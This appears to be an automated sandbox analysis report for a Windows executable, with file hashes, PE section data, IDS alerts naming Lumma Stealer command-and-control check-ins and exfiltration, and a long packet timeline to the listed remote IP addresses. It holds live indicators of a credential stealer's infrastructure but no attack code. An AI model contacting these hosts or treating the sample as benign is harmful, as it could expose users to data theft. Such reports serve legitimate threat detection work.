                                                                                                                                                                                        SHA1:1EBCF74B5F62FDBE7E1504EA04133CD687094BDB
                                                                                                                                                                                        SHA-256:F856BDDCABA4440095B5BE80D1FD7F5C3B66A6F598B2F356496BFF9D92E5619D
                                                                                                                                                                                        SHA-512:C22AE4F8581E3D13BC03A3D9914B84E08E99493739CF7CBA6DED17B40E0126161A9721C4DC132309EF0980D4DE16BBE5E544DFC9AB7B48E4E6BBDF38B1392EEF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.../#U..............................................................................................................................................................................................................................................................................................................................................c...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Entropy (8bit):6.503291995330268
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:FBmz85HS0d.exe
                                                                                                                                                                                        File size:2'931'712 bytes
                                                                                                                                                                                        MD5:30669d81a7fc7b2867ecc452ce55d1d9
                                                                                                                                                                                        SHA1:56ca44ab9cc26864bf86a41f82431239baf994a8
                                                                                                                                                                                        SHA256:dad97310b0e1e3b946976f14c39d47bbb7140c31e79597abcd6159c2a4f02c32
                                                                                                                                                                                        SHA512:e2de976235fff3e36dc38a0cebc1fff403396132b35340cb2038f5b8c986e82ec39bef2c86c8d873e9a33eff03b541e518b0d5f62e180340f1b68e46ef5032fb
                                                                                                                                                                                        SSDEEP:24576:iZlWgiFXiAouvRDc6uhm7MQrSclGA7i7mDsY3Cr2jyZbPKokVLCjD1vItJyrF4mZ:iupRvhckMSWr2jy4TVmD20hAY9IUfU
                                                                                                                                                                                        TLSH:28D528A2F505B2CFD4CE5778902FCE82795D07B54B2248D7AA7C74BAADA3CC011B5C68
                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................../...........@.........................../.....3~-...@.................................T0..h..
                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                        Entrypoint:0x6f9000
                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                        Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                        Instruction
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x53054          0x68          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x531f8          0x8           .idata
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name       Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type             Entropy             Characteristics
(no name)  0x1000           0x51000       0x24800   615fabbd27714497d36364e861d6cbc4  False     0.9974047517123288   data                  7.9798629308220566  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc      0x52000          0x1000        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty                 0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata     0x53000          0x1000        0x200     19a29171433eeef17e42fd663f137134  False     0.14453125           data                  0.9996515881509258  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
avozcotg   0x54000          0x2a4000      0x2a3c00  627ff20bd557ee74a178cedfa1065bcb  unknown   unknown              unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rwvgytwe   0x2f8000         0x1000        0x400     26d5dab6cd88a9b961d2adbb73157b64  False     0.77734375           data                  6.149736785383608   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant   0x2f9000         0x3000        0x2200    88cddb85d51137aee774a3fcd3f30c58  False     0.05974264705882353  DOS executable (COM)  0.7820469884240067  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL           Import
kernel32.dll  lstrcpy
Timestamp                        SID      Signature                                                    Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-12-23T09:23:29.389976+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update    3         192.168.2.7  49699        172.67.150.173  443        TCP
2024-12-23T09:23:30.182312+0100  2049836  ET MALWARE Lumma Stealer Related Activity                    1         192.168.2.7  49699        172.67.150.173  443        TCP
2024-12-23T09:23:30.182312+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                    1         192.168.2.7  49699        172.67.150.173  443        TCP
2024-12-23T09:23:31.540071+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update    3         192.168.2.7  49700        172.67.150.173  443        TCP
2024-12-23T09:23:32.310553+0100  2049812  ET MALWARE Lumma Stealer Related Activity M2                 1         192.168.2.7  49700        172.67.150.173  443        TCP
2024-12-23T09:23:32.310553+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                    1         192.168.2.7  49700        172.67.150.173  443        TCP
2024-12-23T09:23:34.252674+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update    3         192.168.2.7  49701        172.67.150.173  443        TCP
2024-12-23T09:23:36.552506+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update    3         192.168.2.7  49703        172.67.150.173  443        TCP
2024-12-23T09:23:38.917767+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update    3         192.168.2.7  49709        172.67.150.173  443        TCP
2024-12-23T09:23:41.665068+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update    3         192.168.2.7  49716        172.67.150.173  443        TCP
2024-12-23T09:23:42.427857+0100  2048094  ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration        1         192.168.2.7  49716        172.67.150.173  443        TCP
2024-12-23T09:23:44.347063+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update    3         192.168.2.7  49723        172.67.150.173  443        TCP
2024-12-23T09:23:49.240072+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update    3         192.168.2.7  49740        172.67.150.173  443        TCP
2024-12-23T09:23:49.985216+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                    1         192.168.2.7  49740        172.67.150.173  443        TCP
2024-12-23T09:23:51.519479+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update    3         192.168.2.7  49746        185.166.143.50  443        TCP
2024-12-23T09:23:54.015497+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update    3         192.168.2.7  49752        3.5.25.82       443        TCP
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Dec 23, 2024 09:23:28.156301975 CET   49699        443        192.168.2.7     172.67.150.173
Dec 23, 2024 09:23:28.156356096 CET   443          49699      172.67.150.173  192.168.2.7
Dec 23, 2024 09:23:28.156423092 CET   49699        443        192.168.2.7     172.67.150.173
Dec 23, 2024 09:23:28.160012007 CET   49699        443        192.168.2.7     172.67.150.173
Dec 23, 2024 09:23:28.160023928 CET   443          49699      172.67.150.173  192.168.2.7
Dec 23, 2024 09:23:29.389894962 CET   443          49699      172.67.150.173  192.168.2.7
Dec 23, 2024 09:23:29.389976025 CET   49699        443        192.168.2.7     172.67.150.173
Dec 23, 2024 09:23:29.393460035 CET   49699        443        192.168.2.7     172.67.150.173
Dec 23, 2024 09:23:29.393471003 CET   443          49699      172.67.150.173  192.168.2.7
Dec 23, 2024 09:23:29.394292116 CET   443          49699      172.67.150.173  192.168.2.7
Dec 23, 2024 09:23:29.442653894 CET   49699        443        192.168.2.7     172.67.150.173
Dec 23, 2024 09:23:29.445832968 CET   49699        443        192.168.2.7     172.67.150.173
Dec 23, 2024 09:23:29.445863008 CET   49699        443        192.168.2.7     172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:29.446072102 CET44349699172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:30.182347059 CET44349699172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:30.182440042 CET44349699172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:30.182531118 CET49699443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:30.200337887 CET49699443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:30.200355053 CET44349699172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:30.215754032 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:30.215780973 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:30.215850115 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:30.216418982 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:30.216434002 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:31.539932013 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:31.540071011 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:31.541282892 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:31.541292906 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:31.541595936 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:31.542917013 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:31.542954922 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:31.542992115 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310538054 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310606956 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310648918 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310713053 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310733080 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310760975 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310781002 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310786963 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310834885 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.313606024 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.313657999 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.313744068 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.313751936 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.323040962 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.323102951 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.323110104 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.332648993 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.332711935 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.332720995 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.380297899 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.430316925 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.473921061 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.473951101 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.502305031 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.503273010 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.503303051 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506010056 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506122112 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506181002 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506310940 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506326914 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506339073 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506346941 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:33.039072990 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:33.039117098 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:33.039222002 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:33.039578915 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:33.039594889 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:34.252393961 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:34.252674103 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:34.253819942 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:34.253828049 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:34.254095078 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:34.256544113 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:34.256707907 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:34.256750107 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:35.239828110 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:35.239927053 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:35.240089893 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:35.240183115 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:35.240206003 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:35.340828896 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:35.340910912 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:35.340996027 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:35.341433048 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:35.341451883 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:36.552427053 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:36.552505970 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:36.553750992 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:36.553776026 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:36.554016113 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:36.555347919 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:36.555438995 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:36.555469990 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:36.555700064 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:36.599351883 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:37.505279064 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:37.505378008 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:37.505441904 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:37.505568027 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:37.505589962 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:37.699285030 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:37.699325085 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:37.699400902 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:37.699702978 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:37.699707031 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:38.917500019 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:38.917767048 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.919342995 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.919359922 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:38.919737101 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921125889 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921247005 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921264887 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921291113 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921318054 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921363115 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921417952 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921431065 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:39.823460102 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:39.823584080 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:39.823642969 CET49709443192.168.2.7172.67.150.173
Timestamp                          Source Port  Dest Port  Source IP        Dest IP
Dec 23, 2024 09:23:39.823760033 CET  49709        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:39.823781967 CET  443          49709      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:40.383656979 CET  49716        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:40.383690119 CET  443          49716      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:40.383825064 CET  49716        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:40.384110928 CET  49716        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:40.384124994 CET  443          49716      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:41.664889097 CET  443          49716      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:41.665067911 CET  49716        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:41.666496038 CET  49716        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:41.666502953 CET  443          49716      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:41.667306900 CET  443          49716      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:41.669182062 CET  49716        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:41.669409037 CET  49716        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:41.669414997 CET  443          49716      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:42.427867889 CET  443          49716      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:42.427961111 CET  443          49716      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:42.428237915 CET  49716        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:42.428388119 CET  49716        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:42.428406000 CET  443          49716      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:42.879301071 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:42.879374027 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:42.879440069 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:42.880003929 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:42.880023003 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.346852064 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.347063065 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.348346949 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.348357916 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.349143982 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.361715078 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.362494946 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.362550020 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.362687111 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.362728119 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.362878084 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.362914085 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.363076925 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.363132000 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.363306999 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.363372087 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.363549948 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.363594055 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.363612890 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.363732100 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.363780975 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.407352924 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.407574892 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.407665968 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.407696009 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.451335907 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.451644897 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.451720953 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.451803923 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.499330997 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.499438047 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:44.547339916 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:44.723990917 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:47.964035988 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:47.964147091 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:47.964210987 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:47.964356899 CET  49723        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:47.964385033 CET  443          49723      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:48.017779112 CET  49740        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:48.017841101 CET  443          49740      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:48.017929077 CET  49740        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:48.018392086 CET  49740        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:48.018410921 CET  443          49740      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:49.239949942 CET  443          49740      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:49.240072012 CET  49740        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:49.241260052 CET  49740        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:49.241266966 CET  443          49740      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:49.241965055 CET  443          49740      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:49.250709057 CET  49740        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:49.250730038 CET  49740        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:49.250853062 CET  443          49740      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:49.985229969 CET  443          49740      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:49.985382080 CET  443          49740      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:49.985459089 CET  49740        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:49.985671043 CET  49740        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:49.985671997 CET  49740        443        192.168.2.7      172.67.150.173
Dec 23, 2024 09:23:49.985717058 CET  443          49740      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:49.985749006 CET  443          49740      172.67.150.173   192.168.2.7
Dec 23, 2024 09:23:50.128657103 CET  49746        443        192.168.2.7      185.166.143.50
Dec 23, 2024 09:23:50.128709078 CET  443          49746      185.166.143.50   192.168.2.7
Dec 23, 2024 09:23:50.128793955 CET  49746        443        192.168.2.7      185.166.143.50
Dec 23, 2024 09:23:50.129163980 CET  49746        443        192.168.2.7      185.166.143.50
Dec 23, 2024 09:23:50.129178047 CET  443          49746      185.166.143.50   192.168.2.7
Dec 23, 2024 09:23:51.519346952 CET  443          49746      185.166.143.50   192.168.2.7
Dec 23, 2024 09:23:51.519479036 CET  49746        443        192.168.2.7      185.166.143.50
